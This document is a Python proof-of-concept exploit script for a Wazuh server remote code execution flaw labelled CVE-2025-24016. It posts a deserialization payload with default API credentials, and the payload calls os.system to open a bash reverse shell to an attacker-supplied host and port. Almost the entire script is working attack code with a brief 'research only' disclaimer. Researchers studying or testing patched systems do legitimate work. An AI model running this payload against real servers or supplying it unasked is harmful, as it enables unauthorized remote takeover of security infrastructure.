README.md
Rendering markdown...
import argparse
import logging
import requests
from requests.auth import HTTPBasicAuth
import pyfiglet
import os
import time
import ipaddress
from packaging import version
import sys
import urllib3
# Root logging configuration: INFO threshold, "timestamp - LEVEL - message" lines.
logging.basicConfig(
    format='%(asctime)s - %(levelname)s - %(message)s',
    level=logging.INFO,
)
# Module-level logger for this script's diagnostics.
logger = logging.getLogger(__name__)
def color_print(text, color=None):
    """Return *text* wrapped in a bold ANSI color escape for the given role.

    Recognized values of *color* are ``'error'`` (red), ``'warning'``
    (yellow), ``'success'`` (green) and ``'info'`` (cyan). Any other value,
    including ``None``, returns *text* unchanged. Despite the name, nothing
    is printed; the caller is expected to print the returned value.
    """
    # (role, SGR foreground code) pairs, checked in the same order as before.
    palette = (
        ('error', '31'),
        ('warning', '33'),
        ('success', '32'),
        ('info', '36'),
    )
    for role, code in palette:
        if color == role:
            return f"\033[1;{code}m{text}\033[0m"
    return text
def version_check():
    """Log the installed versions of the ``requests`` and ``pyfiglet`` packages.

    Best-effort: any exception raised while reading or parsing the version
    attributes is logged at error level and not re-raised.
    """
    try:
        # Parsed in the same order as they are reported.
        parsed = {
            "Requests": version.parse(requests.__version__),
            "PyFiglet": version.parse(pyfiglet.__version__),
        }
        report = "Wazuh Current version:\n" + "".join(
            f"{label}: {value}\n" for label, value in parsed.items()
        )
        logger.info(report)
    except Exception as exc:
        logger.error("Pengecekan versi gagal karena %s", str(exc))
def parse_args(argv=None):
    """Build the command-line parser and parse the arguments.

    Args:
        argv: Optional list of argument strings. When ``None`` (the
            default) argparse reads ``sys.argv[1:]``, which is what this
            function always did; passing a list lets callers and tests drive
            the parser without touching process-wide state.

    Returns:
        argparse.Namespace with ``url``, ``ip``, ``port`` (int),
        ``username``, ``password``, ``config_file`` and ``no_color``.

    Note:
        On a parse error (missing required option, non-integer port)
        argparse prints usage and exits the process with status 2.
    """
    parser = argparse.ArgumentParser(
        description="Wazuh RCE Exploit POC",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )

    # Required options
    required = parser.add_argument_group("Required")
    required.add_argument(
        "-u", "--url", required=True,
        help="URL target (ex: https://<worker-server>:55000/security/user/authenticate/run_as)",
    )
    required.add_argument(
        "-i", "--ip", required=True,
        help="LHOST for reverse shell connection",
    )
    required.add_argument(
        "-p", "--port", required=True, type=int,
        help="LPORT for reverse shell connection",
    )

    # Authentication options
    auth = parser.add_argument_group("Opsi Auth")
    auth.add_argument(
        "-user", "--username", default="wazuh-wui",
        help="Username for auth",
    )
    auth.add_argument(
        "-pass", "--password", default="MyS3cr37P450r.*-",
        help="Password for auth",
    )

    # Additional options
    optional = parser.add_argument_group("Opsi Tambahan")
    optional.add_argument(
        "-c", "--config-file", type=str,
        help="Path to configuration file",
    )
    optional.add_argument(
        "-n", "--no-color", action="store_true",
        help="Nonaktifkan output warna",
    )
    optional.add_argument(
        "--version", action="version",
        version="1.0",
        help="Show program version",
    )

    return parser.parse_args(argv)
def check_ip(ip):
    """Return True when *ip* is a valid IPv4 or IPv6 address.

    Validation is delegated to ``ipaddress.ip_address``. When it raises
    ``ValueError`` the problem is logged and False is returned.
    """
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        logger.error("IP tidak valid: %s", ip)
        return False
    else:
        return True
def check_port(port):
    """Return True when *port* converts to an integer in the range 1..65535.

    A value that ``int()`` rejects with ``ValueError``, or one outside the
    range, is logged at error level and yields False.
    """
    try:
        number = int(port)
    except ValueError:
        logger.error("Port tidak merupakan angka: %s", port)
        return False

    if number < 1 or number > 65535:
        logger.error("Invalid Port: %s", port)
        return False
    return True
def check_url(url):
    """Return True when *url* begins with ``http://`` or ``https://``.

    The previous check only tested for the bare prefix ``"http"``, so values
    such as ``"httpfoo"`` passed validation even though the error message
    promises an ``http://`` / ``https://`` scheme. The comparison stays
    case-sensitive, as before.

    Args:
        url: Target URL string.

    Returns:
        True if the scheme prefix is acceptable; otherwise logs an error and
        returns False.
    """
    # str.startswith accepts a tuple of alternatives.
    if not url.startswith(("http://", "https://")):
        logger.error("Invalid URL, make sure the URL starts with http:// atau https://")
        return False
    return True
def main():
    """Command-line entry point for the proof-of-concept.

    Steps, in order:
      1. Parse arguments and validate LHOST, LPORT and the target URL;
         exit with status 1 if any check fails.
      2. Log dependency versions and print the banner and notice text.
      3. POST the JSON payload to the target URL with HTTP basic auth and a
         10 second timeout; exit with status 1 on a non-200 response or on
         any ``requests`` exception.
      4. Sleep, run ``bash -i`` locally through ``os.system`` and report
         its exit status.

    Intended for authorized research and testing only, as the banner states.
    """
    args = parse_args()

    def local_color_print(text, color=None):
        """Colorize *text* unless ``--no-color`` was given."""
        if args.no_color:
            return text
        return color_print(text, color)

    if not check_ip(args.ip) or not check_port(args.port) or not check_url(args.url):
        logger.error("Invalid IP/Port/URL")
        sys.exit(1)

    version_check()

    ascii_motd = pyfiglet.figlet_format("Wazuh RCE")
    custom_header = (
        "\n" +
        "---------------------------------------------------\n"
        " Custom Wazuh RCE Header\n"
        "---------------------------------------------------\n"
    )
    print(ascii_motd)
    # NOTE(review): the config file path only selects which header is
    # printed; the file itself is never opened in this function.
    if args.config_file:
        print(custom_header)
    else:
        print("Wazuh Server RCE - CVE-2025-24016")
    print("Research & Testing Purposes Only!")
    print("Unauthorized use is strictly prohibited.")
    print("By: Jessie at Pelindo Cyber Security Team")
    print("Credits: Aiman, Cahyo, Ihsan & the Arch \n")

    # Payload
    payload = {
        "__unhandled_exc__": {
            "__class__": "os.system",
            "__args__": [
                f"bash -i >& /dev/tcp/{args.ip}/{args.port} 0>&1"
            ]
        }
    }
    headers = {
        "Content-Type": "application/json",
        "X-Header-Name": "Custom-Header"
    }

    # Auth
    username = args.username
    password = args.password

    # NOTE(review): certificate verification is disabled for the request
    # below (verify=False) and the matching urllib3 warning is silenced.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    try:
        response = requests.post(
            args.url,
            json=payload,
            headers=headers,
            auth=HTTPBasicAuth(username, password),
            verify=False,
            timeout=10
        )
        if response.status_code != 200:
            logger.error("Kode status respons: %d", response.status_code)
            if "Unauthorized" in str(response.text):
                logger.error("Failed Authentication")
            else:
                logger.error("Respons abnormal: %s", response.text)
            sys.exit(1)
        # Use the --no-color aware wrapper; previously color_print was called
        # directly, so the flag had no effect on these messages.
        print(local_color_print("Sucess Authentication!", "success"))
        print("Respons:", local_color_print(response.text, "info"))
    except requests.exceptions.RequestException as e:
        error_type = type(e).__name__
        logger.error("%s: %s", error_type, str(e))
        sys.exit(1)

    # Shell options
    reverse_shell_options = {
        "command": "bash -i",
        "reverse_port": args.port,
        "timeout": 5,
        "retry_count": 3
    }
    # NOTE(review): this line is logged before anything checks for a
    # connection, and the command below runs on the local machine; only the
    # "command" and "timeout" entries of the dict are read.
    logger.info("Established connection reverse shell to %s:%d", args.ip, int(args.port))
    time.sleep(reverse_shell_options["timeout"])

    status = os.system(reverse_shell_options["command"])
    if status != 0:
        logger.error("Reverse shell failed: %s", str(status))
    else:
        # Previously printed unconditionally, even right after the failure
        # message above.
        print(local_color_print("Reverse shell success!", "success"))
# Run the command-line entry point only when executed as a script,
# not when this file is imported as a module.
if __name__ == "__main__":
    main()